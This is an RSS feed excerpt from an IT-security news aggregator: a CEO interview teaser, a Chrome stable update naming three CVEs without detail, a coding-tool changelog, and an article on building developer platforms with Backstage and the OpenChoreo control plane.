<title><![CDATA[Two CEOs on why security and AI readiness belong together]]></title>
<description><![CDATA[SuperOps and Guardz are bundling PSA, RMM, MDM, and agentic SecOps into one offering for MSPs. In this Help Net Security Q&A, SuperOps CEO Arvind Parthiban and Guardz CEO Dor Eisner explain how a connected stack cuts the time and context lost to tool-switching, lowers costs against multi-vendor s...]]></description>
<link>https://tsecurity.de/de/3626401/it-security-nachrichten/two-ceos-on-why-security-and-ai-readiness-belong-together/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626401/it-security-nachrichten/two-ceos-on-why-security-and-ai-readiness-belong-together/</guid>
<pubDate>Fri, 26 Jun 2026 07:52:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>SuperOps and Guardz are bundling PSA, RMM, MDM, and agentic SecOps into one offering for MSPs. In this Help Net Security Q&amp;A, SuperOps CEO Arvind Parthiban and Guardz CEO Dor Eisner explain how a connected stack cuts the time and context lost to tool-switching, lowers costs against multi-vendor setups, and helps close the gap between average MSP margins of 8% and the 18% top performers reach. They also discuss what makes a platform AI-native, and … <a href="https://www.helpnetsecurity.com/2026/06/26/superops-guardz-ceo-partnership/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/26/superops-guardz-ceo-partnership/">Two CEOs on why security and AI readiness belong together</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for Desktop]]></title>
<description><![CDATA[The Stable channel has been updated to 149.0.7827.200/201 for Windows and Mac and 149.0.7827.200 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the LogSecurity Fixes and RewardsNote: Access to bug details and links may be kept restr...]]></description>
<link>https://tsecurity.de/de/3625978/it-security-nachrichten/stable-channel-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625978/it-security-nachrichten/stable-channel-update-for-desktop/</guid>
<pubDate>Fri, 26 Jun 2026 00:22:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span face="Roboto, sans-serif"><span color="rgba(0, 0, 0, 0.87)">The Stable channel has been updated to 149.0.7827.200/201 for Windows and</span><span color="rgba(0, 0, 0, 0.87)"> </span><span color="rgba(0, 0, 0, 0.87)">Mac and </span></span><span color="rgba(0, 0, 0, 0.87)"><span>149.0.7827.200 for Linux, which will roll out over the coming days/weeks. A full list of changes in this build is available in the </span><a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.197..149.0.7827.201?pretty=fuller&amp;n=10000">Log</a></span></p><p><span face="Arial, sans-serif">Security Fixes and Rewards</span></p><p><span face="Arial, sans-serif">Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.</span></p><p><span face="Arial,sans-serif">This update includes <a href="https://issues.chromium.org/issues?q=customfield1223088:5-M149">3</a> security </span><span face="Arial,sans-serif">fixes. </span><span face="Arial,sans-serif">Please see the </span><a href="https://www.chromium.org/Home/chromium-security"><span face="Arial,sans-serif">Chrome Security Pag</span></a><span><u>e</u></span><span face="Arial,sans-serif">for more information.</span></p><p><span face="Arial, sans-serif"><br></span></p><p><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/513138301"><span face="Arial, sans-serif">513138301</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-13281: Integer overflow in Mojo. </span><span face="Arial, sans-serif">Reported by Google on 2026-05-14</span></p><p><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/517522620"><span face="Arial, sans-serif">517522620</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-13282: Use after free in Payments. </span><span face="Arial, sans-serif">Reported by Google on 2026-05-28</span></p><p><span face="Arial, sans-serif">[N/A][</span><a href="https://issues.chromium.org/issues/522561151"><span face="Arial, sans-serif">522561151</span></a><span face="Arial, sans-serif">]</span><span face="Arial, sans-serif"> High </span><span face="Arial, sans-serif">CVE-2026-13283: Use after free in AdFilter. </span><span face="Arial, sans-serif">Reported by Google on 2026-06-11</span></p><p><span face="Arial, sans-serif"><br></span></p><p><span face="Arial, sans-serif">We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.</span></p><p><span face="Arial, sans-serif"><br></span></p><p><span face="Arial, sans-serif">Many of our security bugs are detected using </span><a href="https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer"><span face="Arial, sans-serif">AddressSanitizer</span></a><span face="Arial, sans-serif">, </span><a href="https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer"><span face="Arial, sans-serif">MemorySanitizer</span></a><span face="Arial, sans-serif">, </span><a href="https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer"><span face="Arial, sans-serif">UndefinedBehaviorSanitizer</span></a><span face="Arial, sans-serif">, </span><a href="https://www.chromium.org/developers/testing/control-flow-integrity/"><span face="Arial, sans-serif">Control Flow Integrity</span></a><span face="Arial, sans-serif">, </span><a href="https://chromium.googlesource.com/chromium/src/+/HEAD/testing/libfuzzer/README.md"><span face="Arial, sans-serif">libFuzzer</span></a><span face="Arial, sans-serif">, or </span><a href="https://github.com/google/afl"><span face="Arial, sans-serif">AFL</span></a><span face="Arial, sans-serif">.</span></p><p><br></p><div><br></div><div><p><span><span>Interested in switching release channels? Find out how<span> </span></span><a href="https://www.chromium.org/getting-involved/dev-channel">here</a><span>. If you find a new issue, please let us know by<span> </span></span><a href="https://crbug.com/">filing a bug</a><span>. The<span> </span></span><a href="https://support.google.com/chrome/community">community help forum</a><span> is also a great place to reach out for help or learn about common issues.</span></span></p><p><span><br></span></p><p><span>Daniel Yip</span></p><p><span color="rgba(0, 0, 0, 0.87)"></span></p><p><span>Google Chrome</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.17.11]]></title>
<description><![CDATA[Core
Improvements

Add session snapshots and revert controls so you can roll a session back to an earlier message, including file changes.

Bugfixes

Always print the MCP OAuth URL so manual sign-in still works when opening the browser flow.

Desktop
Improvements

Add Chrome-style tab cycle short...]]></description>
<link>https://tsecurity.de/de/3624454/downloads/v11711/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624454/downloads/v11711/</guid>
<pubDate>Thu, 25 Jun 2026 14:16:52 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Core</h2>
<h3>Improvements</h3>
<ul>
<li>Add session snapshots and revert controls so you can roll a session back to an earlier message, including file changes.</li>
</ul>
<h3>Bugfixes</h3>
<ul>
<li>Always print the MCP OAuth URL so manual sign-in still works when opening the browser flow.</li>
</ul>
<h2>Desktop</h2>
<h3>Improvements</h3>
<ul>
<li>Add Chrome-style tab cycle shortcuts with <code>mod+1</code> through <code>mod+9</code>.</li>
<li>Add draggable tabs. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Improve the empty home state when you have no sessions. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Restyle the jump-to-latest button in the v2 session view. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
<li>Improve the redesigned desktop layout, including better titlebar tabs and archived sessions. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>)</li>
</ul>
<h3>Bugfixes</h3>
<ul>
<li>Keep prompt drafts attached to the correct project server.</li>
<li>Restore consistent titlebar tab sizing and layout.</li>
<li>Restore home actions when session lists are empty or still loading.</li>
<li>Keep todo docks in place when switching between sessions.</li>
<li>Automatically close tabs for sessions that no longer exist.</li>
<li>Keep provider dialogs, prompt rollbacks, and async attachments tied to the session where they started.</li>
<li>Clear late session notifications after you open the session.</li>
<li>Remove the session loading stripe.</li>
</ul>
<p><strong>Thank you to 2 community contributors:</strong></p>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/isaachuangGMICLOUD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/isaachuangGMICLOUD">@isaachuangGMICLOUD</a>:
<ul>
<li>docs: add GMI Cloud provider entry to providers directory (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4696373509" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/32914" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/32914/hovercard" href="https://github.com/anomalyco/opencode/pull/32914">#32914</a>)</li>
</ul>
</li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arvsrn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arvsrn">@arvsrn</a>:
<ul>
<li>feat(app): draggable tabs (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613330568" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/31364" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/31364/hovercard" href="https://github.com/anomalyco/opencode/pull/31364">#31364</a>)</li>
<li>feat(app): ui improvements (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665114674" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/32438" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/32438/hovercard" href="https://github.com/anomalyco/opencode/pull/32438">#32438</a>)</li>
<li>fix(app): update all v1 new-session icons (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4647725258" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/32017" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/32017/hovercard" href="https://github.com/anomalyco/opencode/pull/32017">#32017</a>)</li>
<li>feat(app): no sesssions empty state (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4714567084" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/33315" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/33315/hovercard" href="https://github.com/anomalyco/opencode/pull/33315">#33315</a>)</li>
<li>feat(app): restyle v2 jump-to-latest button (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741393453" data-permission-text="Title is private" data-url="https://github.com/anomalyco/opencode/issues/33809" data-hovercard-type="pull_request" data-hovercard-url="/anomalyco/opencode/pull/33809/hovercard" href="https://github.com/anomalyco/opencode/pull/33809">#33809</a>)</li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Building a state-of-the-art development platform with Backstage]]></title>
<description><![CDATA[Key takeaways




Backstage solved the portal problem, not the platform problem. A portal organizes catalogs, documentation, and templates. A platform owns deployments, environments, policies, and runtime operations. Backstage assumes that the execution layer exists beneath it.



Point-to-point ...]]></description>
<link>https://tsecurity.de/de/3623951/ai-nachrichten/building-a-state-of-the-art-development-platform-with-backstage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623951/ai-nachrichten/building-a-state-of-the-art-development-platform-with-backstage/</guid>
<pubDate>Thu, 25 Jun 2026 11:34:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li>Backstage solved the portal problem, not the platform problem. A portal organizes catalogs, documentation, and templates. A platform owns deployments, environments, policies, and runtime operations. Backstage assumes that the execution layer exists beneath it.</li>



<li>Point-to-point integrations become a maintenance burden. Many organizations end up with a “messy middle” where Backstage is connected directly to <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD</a>, <a href="https://www.infoworld.com/article/2259088/what-is-gitops-extending-devops-to-kubernetes-and-beyond.html" data-type="link" data-id="https://www.infoworld.com/article/2259088/what-is-gitops-extending-devops-to-kubernetes-and-beyond.html">GitOps</a>, <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html" data-type="link" data-id="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a>, and <a href="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html" data-type="link" data-id="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html">observability</a> tools through custom wiring that’s fragile and hard to evolve.</li>



<li>Abstractions are the interface between developers and infrastructure. Developers work with components, endpoints, and dependencies. Platform engineers work with environments, pipelines, and component types. The platform compiles both into Kubernetes resources.</li>



<li>A control plane bridges the gap. It sits between the portal and runtime, compiling abstractions into infrastructure, enforcing policies consistently, reconciling drift, and aggregating runtime state back to the portal.</li>



<li>Good abstractions enable advanced capabilities. Unified observability, automated guardrails, and AI agents that can reason about and act on your platform. All becomes possible when you have well-defined concepts and a control plane that understands both sides.</li>
</ul>



<p>…</p>



<h2 class="wp-block-heading">Start with Backstage</h2>



<p>If you’re building an <a href="https://www.infoworld.com/article/2263059/what-is-an-internal-developer-platform-paas-done-your-way.html" data-type="link" data-id="https://www.infoworld.com/article/2263059/what-is-an-internal-developer-platform-paas-done-your-way.html">internal developer platform</a>, Backstage is certainly part of your architecture. It solved the discovery problem and became the default choice for developer portals.</p>



<p>Before Backstage, developers navigated wikis, spreadsheets, and tribal knowledge just to find who owned a service or how to spin up a new one. Backstage brought structure: a unified catalog, a plugin ecosystem, and golden-path templates that actually got adopted.</p>



<p><a href="https://github.com/backstage/backstage" data-type="link" data-id="https://github.com/backstage/backstage">Backstage</a> is a Cloud Native Computing Foundation (CNCF) project with one of the most active contributor communities in the ecosystem. When organizations evaluate developer portals, Backstage is the starting point.</p>



<p>However, many teams discover something after deployment: Backstage provides a portal, not a platform. A portal organizes information. A platform owns execution: deployments, environments, policies, observability, and runtime operations.</p>



<p>Backstage assumes that the execution layer exists beneath it. That layer is where most of the complexity lives, and it’s what this article is about.</p>



<h2 class="wp-block-heading"><a></a>What a developer platform actually is</h2>



<p>A developer platform or an internal developer platform is a self-service framework you build to help developers build, deploy, and manage applications independently.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_01_developer_platform.png" alt="Image_01_developer_platform" class="wp-image-4189088" width="1024" height="307" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<p>Most organizations already have an organically grown version of this:</p>



<ul class="wp-block-list">
<li>Developer commits code</li>



<li>CI pipeline builds and pushes images to a registry</li>



<li>Pipeline updates a GitOps repo containing Helm charts or Kubernetes manifests</li>



<li>Argo CD or Flux syncs those manifests to clusters</li>
</ul>



<p>You may have this workflow running today. The question is whether it’s a pipeline stitched together with scripts and tribal knowledge, or a platform with consistent abstractions and self-service capabilities.</p>



<h2 class="wp-block-heading"><a></a>What usually happens after adopting Backstage</h2>



<p>How do you add Backstage to this setup? The common approach is for developers to maintain Backstage entity files (primarily component and API entities) alongside the source code. Then you configure the built-in entity provider in Backstage to scan source code repositories to populate the catalog. Eventually, you’ll end up with a portal with all your systems, components, APIs, and other resources. So far, so good.</p>



<p>Once developers start using the portal, you’ll be hit with a consistent flow of feature requests:</p>



<ul class="wp-block-list">
<li>“I see my component in the catalog, but is it actually running?” You configure the Kubernetes plugin and link components to their corresponding manifests. Now developers can see pod status, deployment state, and replica counts.</li>



<li>“I need logs, metrics, and traces related to my component.” You integrate your observability stack or developers context-switch to Grafana, Datadog, or whatever you’re running. Either way, more wiring.</li>



<li>“Can I create new components from here?” You build Backstage templates that scaffold repos with the right structure, Backstage entities, Helm charts, and CI pipelines, all of which encode your organization’s best practices. Now you’re maintaining golden paths in templates, separately from the runtime configuration that actually enforces them.</li>
</ul>



<p>Each request is reasonable and achievable, but they add up.</p>



<h2 class="wp-block-heading"><a></a>The messy middle</h2>



<p>Eventually, you end up with a platform held together by point-to-point connections. Every new capability requires new wiring. Every upgrade risks breaking something. You spend more time maintaining integrations than building features.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_02_messy_middle.png" alt="Image_02_messy_middle" class="wp-image-4189092" width="1024" height="893" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<p>You would never design a production system with this many point-to-point dependencies. Why accept it for your platform?</p>



<h2 class="wp-block-heading"><a></a>Treat the platform as a product, but also as a system</h2>



<p>Organically grown systems get you started, but once you commit to Backstage as your portal, you need a product mindset. Start from developer experience, understand their pain points, then design a system that addresses them coherently.</p>



<p>A platform is also a system. Approach it the way you would approach any production system you’re building. You wouldn’t design a back-end service without thinking about separation of concerns, clear interfaces, and extensibility.</p>



<p>The same principles apply here:</p>



<ul class="wp-block-list">
<li>Separation of concerns: Don’t mix developer-facing abstractions with infrastructure implementation. Keep them separate so you can evolve each independently.</li>



<li>Clear interfaces: Define explicit abstractions. Developers and platform engineers should interact with well-defined concepts rather than implementation details scattered across Helm charts and CI scripts.</li>



<li>Extensibility: Requirements keep changing. If every new capability requires custom wiring, you’ll spend more time maintaining than improving. Design for extension from the start.</li>
</ul>



<p>The difference between a pile of integrations and a platform is architecture. Get the system design right, and new capabilities slot in cleanly. Get it wrong, and every feature request becomes a maintenance burden.</p>



<h2 class="wp-block-heading">The missing layer beneath Backstage</h2>



<p>Moving from an organically grown pipeline to an actionable developer platform is a big leap. You probably have CI/CD pipelines that work, a Kubernetes cluster running workloads, and a Backstage catalog describing what exists.</p>



<p>The questions are:</p>



<ul class="wp-block-list">
<li>How do you transform an informational portal into one with a platform under the hood?</li>



<li>How do you bridge the gap between what the catalog describes and what’s actually running?</li>



<li>How do you enforce golden paths beyond initial scaffolding?</li>



<li>How do you design a platform that evolves with your organization’s needs?</li>
</ul>



<p>What’s missing is a connective layer between Backstage and your runtime, something that makes the portal operational rather than just informational. Let’s look at the key architectural elements to consider when designing that layer and the whole platform.</p>



<h2 class="wp-block-heading"><a></a>Start with abstractions</h2>



<p>One of the main goals of a developer platform is to reduce cognitive load. The platform should meet developers where they are and speak their language, not Kubernetes’.</p>



<p>Every organization has its own vocabulary, but the Backstage system model is a good starting point. It may not cover everything, but you can extend it with custom entities. The key is that developers work with high-level concepts while the platform compiles them into Kubernetes resources. Developers are abstracted away from the underlying details, but they can still see what’s happening underneath.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Concept</strong></td><td><strong>Description</strong></td><td><strong>Backstage mapping</strong></td></tr><tr><td>Project</td><td>A cloud-native application composed of multiple components. It is also a unit of isolation.</td><td>System</td></tr><tr><td>Component</td><td>A deployable unit, such as web services, APIs, workers, or scheduled tasks.</td><td>Component</td></tr><tr><td>Endpoint</td><td>A network-accessible interface exposed by a component. </td><td>API</td></tr><tr><td>Resource</td><td>External infrastructure such as databases, queues, and caches.</td><td>Resource</td></tr><tr><td>Dependency</td><td>A component’s reliance on endpoints or resources.</td><td>consumesAPI, dependsOn</td></tr></tbody></table> </div></figure>



<p>These are not just static abstractions; they also have associated runtime semantics. The following diagram illustrates runtime representations of these concepts.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_03_cell_diagram.png" alt="Image_03_cell_diagram" class="wp-image-4189100" width="1024" height="905" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<p>In the workload cluster, a project becomes an isolation boundary for all of its components. The platform translates this into Kubernetes namespaces and network policies that enforce the boundary, not just document it.</p>



<p>Endpoint visibility determines which endpoints can talk to which. A project-scoped endpoint gets network policies that block traffic from outside the project. An organization-scoped endpoint is exposed to internal traffic but remains behind the internal gateway. An external endpoint gets routed through the public gateway with appropriate authentication. Developers declare visibility; the platform generates the policies.</p>



<p>Dependencies work the same way. When a component declares a dependency on an endpoint, the platform injects the URL and other environment variables required to connect to the dependency. It configures the network policies for both directions, egress from the calling endpoint and ingress to the target endpoint. Without the declared dependency, egress is blocked by default. The dependency graph you see above reflects actual permitted traffic flow, not just intended relationships.</p>



<h2 class="wp-block-heading"><a></a>You need platform abstractions, too</h2>



<p>Developer abstractions help your developers. Platform abstractions help you.</p>



<p>While developers work with components, endpoints, and dependencies, you need a different vocabulary to design and operate the platform itself. These abstractions let you and your team define standards, enforce policies, and create structure without writing low-level configurations for every scenario.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Concept</strong></td><td><strong>Description</strong></td></tr><tr><td>Namespace</td><td>A logical grouping of users and resources, typically aligned to a company, business unit, or team. Defines ownership and access boundaries.</td></tr><tr><td>Data plane</td><td>A Kubernetes cluster that hosts one or more deployment environments. You can have multiple data planes for isolation, regional distribution, or scaling.</td></tr><tr><td>Environment</td><td>A runtime context, such as dev, test, staging, or prod, where workloads are deployed and executed. Environments carry their own policies and resource configurations.</td></tr><tr><td>Pipeline</td><td>A defined process that governs how work, such as builds, deployments, promotions, or any automated workflows, flows through the platform. Encodes your operational processes as a platform primitive.</td></tr><tr><td>Component type</td><td>Defines a category of workload—Service, Worker, Cron, Job.</td></tr><tr><td>Trait</td><td>A reusable capability that attaches to any component, such as autoscaling, resilience, observability, and security policies. Compose behaviors without duplicating configuration.</td></tr></tbody></table> </div></figure>



<p>These abstractions separate platform concerns from application concerns. Developers don’t need to know which cluster their code runs on or how environments are wired together. They deploy to “staging” or “prod,” and you define what those terms mean.</p>



<h2 class="wp-block-heading"><a></a>The missing layer is a control plane</h2>



<p>The control plane is where abstractions become real. It sits between the portal and your workload clusters, translating developer intent into infrastructure configuration.</p>



<p>You can think of it as a compiler that targets Kubernetes clusters, converting higher-level abstractions into what Kubernetes and its underlying frameworks understand. It can also apply platform-wide rules during this compilation. Resource limits, security requirements, etc., can be enforced consistently, not merely documented and hoped for.</p>



<p>But compilation is only half the job. The control plane also reconciles continuously. It monitors drift between the declared and actual states. When they diverge, it corrects. Your abstractions remain the source of truth; the control plane enforces them over time.</p>



<h2 class="wp-block-heading"><a></a>Programmability is not optional</h2>



<p>One of the key aspects of this control plane is programmability. If you want your platform to evolve, the control plane needs to be extensible. Different teams have different requirements. New capabilities emerge. You can’t anticipate everything up front.</p>



<p>This means allowing customization of how abstractions compile to Kubernetes manifests. But extensibility without guardrails is dangerous. You need programmability that preserves your invariants. The goal is constrained flexibility, open enough to evolve, structured enough to stay coherent.</p>



<h2 class="wp-block-heading"><a></a>Observable abstractions make the portal useful</h2>



<p>The control plane also aggregates runtime state and associates it with your abstractions. This is what makes the portal useful. Without this, developers piece together information from different tools: Kubernetes dashboard for pod status, Argo CD for the deployment state, Grafana for metrics, Jaeger for traces. Each tool knows part of the story; none shows the full picture.</p>



<p>With the control plane aggregating state, the portal tells a connected story. When a developer opens a component page in Backstage, they see:</p>



<ul class="wp-block-list">
<li>Deployed environments and their status</li>



<li>Current replicas and resource usage</li>



<li>Recent deployments and who triggered them</li>



<li>Logs, metrics, and traces that are scoped to that component, in each environment</li>



<li>Dependencies and their health</li>
</ul>



<p>No context-switching. No reconstructing which pod belongs to which service in which cluster. The abstraction is the anchor; everything else attaches to it.</p>



<p>This only works because the control plane understands both sides. It compiled the abstractions to Kubernetes, so it knows how to map runtime data back. Information flows in both directions. Downward: developer intent flows through the control plane and becomes running workloads. Upward: runtime state flows back through the control plane and appears in the portal.</p>



<p>This is what makes the portal actionable. It’s not just displaying information; it’s connected to a system that can act.</p>



<h2 class="wp-block-heading"><a></a>Data plane: keep it simple</h2>



<p>The data plane is where your workloads actually run. In most cases, this means one or more Kubernetes clusters. The data plane doesn’t know about your abstractions. It understands Kubernetes primitives such as pods, deployments, services, and ingresses. The control plane’s job is to compile your higher-level concepts into these primitives and apply them.</p>



<p>The data plane does one thing: it runs what the control plane tells it to run. The intelligence lives in the control plane; the execution happens in the data plane.</p>



<h2 class="wp-block-heading">Where AI fits into the platform</h2>



<p>AI is now part of every platform conversation, but the architectural question is where it actually belongs.</p>



<p>The abstractions and control plane you’ve built create the foundation. You have well-defined concepts such as components, endpoints, and dependencies. You have a runtime state aggregated and tied to those concepts. You have a connected view of your system. AI agents can definitely leverage this.</p>



<h3 class="wp-block-heading"><a></a>Agents as platform users</h3>



<p>AI agents should be able to interact with your platform as first-class participants. This requires exposing platform capabilities through interfaces that agents can use, such as <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) servers, APIs with clear semantics, user-friendly CLIs, and skills that map to platform operations.</p>



<p>These capabilities of the platform enable agents to create components, trigger builds and deployments, query environment status, and reason about dependencies. They help you and your developers become more productive.</p>



<h3 class="wp-block-heading"><a></a>Agents as platform capabilities</h3>



<p>You can also embed agents inside your platform to help your teams’ day-to-day operations. Here are some examples of agents you can develop:</p>



<ul class="wp-block-list">
<li>SRE agents: Analyze logs, metrics, and traces to surface likely root causes. Instead of developers digging through dashboards, the agent correlates signals and suggests where to look.</li>



<li>FinOps agents: Help teams understand and optimize resource costs across environments and components.</li>



<li>Architect agents: Assist with system design decisions, such as dependency analysis, capacity planning, and migration impact assessment.</li>
</ul>



<p>These agents work because they have access to the control plane’s unified view. They see abstractions, runtime state, and observability data in one place, the same connected story developers see in the portal.</p>



<p>The pattern holds. Good abstractions make everything easier, including AI.</p>



<h2 class="wp-block-heading"><a></a>OpenChoreo as a reference implementation</h2>



<p><a href="https://github.com/openchoreo/openchoreo" data-type="link" data-id="https://github.com/openchoreo/openchoreo">OpenChoreo</a> is an open-source developer platform for Kubernetes. It was recently accepted into the CNCF as a sandbox project. OpenChoreo implements the architecture described in this article: developer abstractions backed by a control plane, a Backstage-powered portal, integrated CI/CD and GitOps, and observability wired to your abstractions.</p>



<p>If you’re building this architecture yourself, OpenChoreo is worth studying as a reference, even if you don’t adopt it directly. The project demonstrates how these pieces fit together: how abstractions compile into Kubernetes resources, how runtime state flows back to the portal, and how guardrails are enforced during compilation.</p>



<p>You can use OpenChoreo as a complete platform, or install its Backstage plugins into your existing portal and use just the control plane layer. Either way, the underlying patterns are what matter. The architecture is the idea. OpenChoreo is one way to implement it.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/image_04_multi_plane_architecture.png?w=1024" alt="image_04_multi_plane_architecture" class="wp-image-4189109" width="1024" height="552" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<h2 class="wp-block-heading">A useful mental model: multi-plane architecture</h2>



<p>OpenChoreo separates concerns across five planes:</p>



<ol class="wp-block-list">
<li>Experience plane: Where developers, platform engineers, and SREs interact with the platform via the Backstage-powered portal, CLI, GitOps, or AI agents.</li>



<li>Control plane: The brain that translates high-level abstractions (components, APIs, environments, pipelines) into Kubernetes manifests. Programmable through component types and traits, so you can extend it without forking or writing low-level controllers. Continuously reconciles the runtime state back into those abstractions.</li>



<li>Data plane: Where workloads run. Enforces the semantics of your abstractions, such as project isolation, traffic policies, and security boundaries. These aren’t just configurations; the platform guarantees them.</li>



<li>Observability plane: Feeds metrics, logs, and traces back through the same abstractions developers already understand, requiring no translation.</li>



<li>Workflow plane (optional): Handles builds using Cloud Native Buildpacks and Argo Workflows by default.</li>
</ol>



<p>These planes work together but remain separate concerns. You can reason about each independently, evolve them at different rates, and deploy them flexibly: a single cluster with namespace isolation for dev/test, fully separated multi-cluster setups for production, or hybrid topologies that colocate planes like Control and CI for cost efficiency.</p>



<h2 class="wp-block-heading"><a></a>AI and OpenChoreo</h2>



<p>OpenChoreo is being built to treat AI agents as first-class participants. In OpenChoreo 1.0, external agents can interact with the platform via MCP servers, agent skills, or the CLI to generate and edit component configurations, reason about releases and environments, and more. The built-in SRE Agent is a first example of this. It analyzes logs, metrics, and traces from your deployments and uses LLMs to surface likely root causes and actionable insights.</p>


